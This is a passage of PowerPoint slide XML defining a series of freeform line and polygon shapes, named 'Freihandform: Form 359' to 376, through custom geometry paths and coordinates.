                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65FC0310-96FD-4087-979D-93BA7D273E3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7023406" y="48719"/>
              <a:ext cx="236779" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96097"/>
                <a:gd name="connsiteY0" fmla="*/ 52358 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 96099 w 96097"/>
                <a:gd name="connsiteY1" fmla="*/ -3111 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96097" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="52358"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96099" y="-3111"/>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60" name="Freihandform: Form 359">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CDEA099-2CD4-4C81-9000-2B76EAE8C0A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5131457" y="731841"/>
              <a:ext cx="236592" cy="546685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY0" fmla="*/ 163371 h 221873"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY1" fmla="*/ 52434 h 221873"/>
                <a:gd name="connsiteX2" fmla="*/ 95985 w 96021"/>
                <a:gd name="connsiteY2" fmla="*/ -3035 h 221873"/>
                <a:gd name="connsiteX3" fmla="*/ 96023 w 96021"/>
                <a:gd name="connsiteY3" fmla="*/ 218838 h 221873"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96021" h="221873">
                  <a:moveTo>
                    <a:pt x="1" y="163371"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="52434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95985" y="-3035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96023" y="21883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61" name="Freihandform: Form 360">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0236794-4F60-4144-98CD-4685698FC8DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5131457" y="731841"/>
              <a:ext cx="236592" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY0" fmla="*/ -3053 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 96023 w 96021"/>
                <a:gd name="connsiteY1" fmla="*/ 52414 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96021" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="-3053"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96023" y="5241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62" name="Freihandform: Form 361">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D1E788-1D2B-4EC7-9E55-BBAB25F08DA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624641" y="1551868"/>
              <a:ext cx="23469" cy="23469"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ -2989 h 9525"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -2989 h 9525"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="9525">
                  <a:moveTo>
                    <a:pt x="1" y="-2989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2989"/>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63" name="Freihandform: Form 362">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{199A17FE-375B-4703-A1E1-F54112406674}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624641" y="1414958"/>
              <a:ext cx="236686" cy="136907"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96059"/>
                <a:gd name="connsiteY0" fmla="*/ -2994 h 55564"/>
                <a:gd name="connsiteX1" fmla="*/ 96061 w 96059"/>
                <a:gd name="connsiteY1" fmla="*/ 52570 h 55564"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96059" h="55564">
                  <a:moveTo>
                    <a:pt x="1" y="-2994"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96061" y="5257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64" name="Freihandform: Form 363">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F17208-B48E-405D-AD08-A844E9072F59}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11753392" y="-87954"/>
              <a:ext cx="236592" cy="273110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY0" fmla="*/ 52257 h 110842"/>
                <a:gd name="connsiteX1" fmla="*/ 96023 w 96021"/>
                <a:gd name="connsiteY1" fmla="*/ 107726 h 110842"/>
                <a:gd name="connsiteX2" fmla="*/ 95956 w 96021"/>
                <a:gd name="connsiteY2" fmla="*/ -3117 h 110842"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY3" fmla="*/ 52257 h 110842"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96021" h="110842">
                  <a:moveTo>
                    <a:pt x="1" y="52257"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96023" y="107726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95956" y="-3117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52257"/>
                  </a:lnTo>
                  <a:close/>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65" name="Freihandform: Form 364">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{204E11F9-069E-4BBD-8206-E9DB506779C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280393" y="-497732"/>
              <a:ext cx="236592" cy="819795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96022 w 96021"/>
                <a:gd name="connsiteY0" fmla="*/ 274214 h 332715"/>
                <a:gd name="connsiteX1" fmla="*/ 95994 w 96021"/>
                <a:gd name="connsiteY1" fmla="*/ 52341 h 332715"/>
                <a:gd name="connsiteX2" fmla="*/ 29 w 96021"/>
                <a:gd name="connsiteY2" fmla="*/ -3128 h 332715"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY3" fmla="*/ 329587 h 332715"/>
                <a:gd name="connsiteX4" fmla="*/ 96022 w 96021"/>
                <a:gd name="connsiteY4" fmla="*/ 274214 h 33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21" h="332715">
                  <a:moveTo>
                    <a:pt x="96022" y="274214"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95994" y="52341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="-3128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="329587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96022" y="274214"/>
                  </a:lnTo>
                  <a:close/>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66" name="Freihandform: Form 365">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA5CBE15-B65E-4976-8626-DE1C72AF7388}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8205762" y="-224622"/>
              <a:ext cx="236520" cy="410012"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ 163282 h 166404"/>
                <a:gd name="connsiteX1" fmla="*/ 95984 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ 52346 h 166404"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY2" fmla="*/ -3123 h 166404"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY3" fmla="*/ 107815 h 166404"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95992" h="166404">
                  <a:moveTo>
                    <a:pt x="95994" y="163282"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95984" y="52346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="107815"/>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67" name="Freihandform: Form 366">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96FFB55A-07E9-41AE-8F21-36298EF7340E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624829" y="-87954"/>
              <a:ext cx="23469" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107821 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3117 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110937">
                  <a:moveTo>
                    <a:pt x="1" y="107821"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3117"/>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68" name="Freihandform: Form 367">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4841F4-4053-41F8-9FF8-DF0B2487DF96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10570662" y="-87954"/>
              <a:ext cx="446" cy="1092429"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 182 w 181"/>
                <a:gd name="connsiteY0" fmla="*/ -3082 h 443364"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 181"/>
                <a:gd name="connsiteY1" fmla="*/ 440283 h 443364"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="181" h="443364">
                  <a:moveTo>
                    <a:pt x="182" y="-3082"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="440283"/>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69" name="Freihandform: Form 368">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70DB549-4954-4465-9126-154EB1D817BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10807397" y="-907744"/>
              <a:ext cx="236498" cy="1776253"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY0" fmla="*/ -3123 h 720895"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY1" fmla="*/ 662304 h 720895"/>
                <a:gd name="connsiteX2" fmla="*/ 95984 w 95983"/>
                <a:gd name="connsiteY2" fmla="*/ 717773 h 720895"/>
                <a:gd name="connsiteX3" fmla="*/ 95984 w 95983"/>
                <a:gd name="connsiteY3" fmla="*/ 52344 h 720895"/>
                <a:gd name="connsiteX4" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY4" fmla="*/ -3123 h 72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83" h="720895">
                  <a:moveTo>
                    <a:pt x="1" y="-3123"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="662304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95984" y="717773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95984" y="52344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3123"/>
                  </a:lnTo>
                  <a:close/>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70" name="Freihandform: Form 369">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68CB9373-B865-442D-B67E-ACACD412F49E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8915307" y="-87954"/>
              <a:ext cx="709520" cy="410017"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 287959"/>
                <a:gd name="connsiteY0" fmla="*/ -3111 h 166406"/>
                <a:gd name="connsiteX1" fmla="*/ 287961 w 287959"/>
                <a:gd name="connsiteY1" fmla="*/ 163296 h 166406"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287959" h="166406">
                  <a:moveTo>
                    <a:pt x="1" y="-3111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="287961" y="163296"/>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71" name="Freihandform: Form 370">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18E5A4CC-1EB8-4257-8F2C-393CB8C9FFA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9151923" y="185390"/>
              <a:ext cx="472903" cy="273339"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 191928"/>
                <a:gd name="connsiteY0" fmla="*/ -3093 h 110935"/>
                <a:gd name="connsiteX1" fmla="*/ 191930 w 191928"/>
                <a:gd name="connsiteY1" fmla="*/ 107842 h 110935"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191928" h="110935">
                  <a:moveTo>
                    <a:pt x="1" y="-3093"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191930" y="107842"/>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72" name="Freihandform: Form 371">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5092D979-1655-4093-915A-0B5938BB77DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10807160" y="595168"/>
              <a:ext cx="709662" cy="683122"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 288018 w 288017"/>
                <a:gd name="connsiteY0" fmla="*/ 218737 h 277246"/>
                <a:gd name="connsiteX1" fmla="*/ 288018 w 288017"/>
                <a:gd name="connsiteY1" fmla="*/ 107801 h 277246"/>
                <a:gd name="connsiteX2" fmla="*/ 96051 w 288017"/>
                <a:gd name="connsiteY2" fmla="*/ -3041 h 277246"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 288017"/>
                <a:gd name="connsiteY3" fmla="*/ 52332 h 277246"/>
                <a:gd name="connsiteX4" fmla="*/ 192063 w 288017"/>
                <a:gd name="connsiteY4" fmla="*/ 163270 h 277246"/>
                <a:gd name="connsiteX5" fmla="*/ 192082 w 288017"/>
                <a:gd name="connsiteY5" fmla="*/ 274206 h 27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17" h="277246">
                  <a:moveTo>
                    <a:pt x="288018" y="218737"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="288018" y="107801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96051" y="-3041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192063" y="163270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192082" y="274206"/>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73" name="Freihandform: Form 372">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA46EA00-5CC1-472E-BABC-E3FA98826DAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280440" y="322063"/>
              <a:ext cx="709520" cy="409776"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 287959"/>
                <a:gd name="connsiteY0" fmla="*/ 52393 h 166308"/>
                <a:gd name="connsiteX1" fmla="*/ 191977 w 287959"/>
                <a:gd name="connsiteY1" fmla="*/ 163233 h 166308"/>
                <a:gd name="connsiteX2" fmla="*/ 287960 w 287959"/>
                <a:gd name="connsiteY2" fmla="*/ 107862 h 166308"/>
                <a:gd name="connsiteX3" fmla="*/ 95927 w 287959"/>
                <a:gd name="connsiteY3" fmla="*/ -3076 h 166308"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287959" h="166308">
                  <a:moveTo>
                    <a:pt x="1" y="52393"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191977" y="163233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287960" y="107862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95927" y="-3076"/>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74" name="Freihandform: Form 373">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AAF04A0-99E0-4D02-94B6-7F5DBBDA21EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11753392" y="458731"/>
              <a:ext cx="236592" cy="1366010"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY0" fmla="*/ 495905 h 554397"/>
                <a:gd name="connsiteX1" fmla="*/ 11 w 96021"/>
                <a:gd name="connsiteY1" fmla="*/ 52445 h 554397"/>
                <a:gd name="connsiteX2" fmla="*/ 96023 w 96021"/>
                <a:gd name="connsiteY2" fmla="*/ -3024 h 554397"/>
                <a:gd name="connsiteX3" fmla="*/ 96013 w 96021"/>
                <a:gd name="connsiteY3" fmla="*/ 551374 h 554397"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96021" h="554397">
                  <a:moveTo>
                    <a:pt x="1" y="495905"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11" y="52445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96023" y="-3024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96013" y="55137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75" name="Freihandform: Form 374">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEB8AA96-E2EB-4840-AF61-B34221161767}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280440" y="595168"/>
              <a:ext cx="236358" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95926"/>
                <a:gd name="connsiteY0" fmla="*/ 52405 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 95927 w 95926"/>
                <a:gd name="connsiteY1" fmla="*/ -3064 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95926" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="52405"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95927" y="-306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76" name="Freihandform: Form 375">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96855D34-F40B-4BF3-89F7-60C66859D523}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280511" y="868509"/>
              <a:ext cx="236240" cy="136907"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95878"/>
                <a:gd name="connsiteY0" fmla="*/ 52523 h 55564"/>
                <a:gd name="connsiteX1" fmla="*/ 95880 w 95878"/>
                <a:gd name="connsiteY1" fmla="*/ -3041 h 55564"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95878" h="55564">
                  <a:moveTo>
                    <a:pt x="1" y="52523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95880" y="-3041"/>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77" name="Freihandform: Form 376">
              <a:extLst>
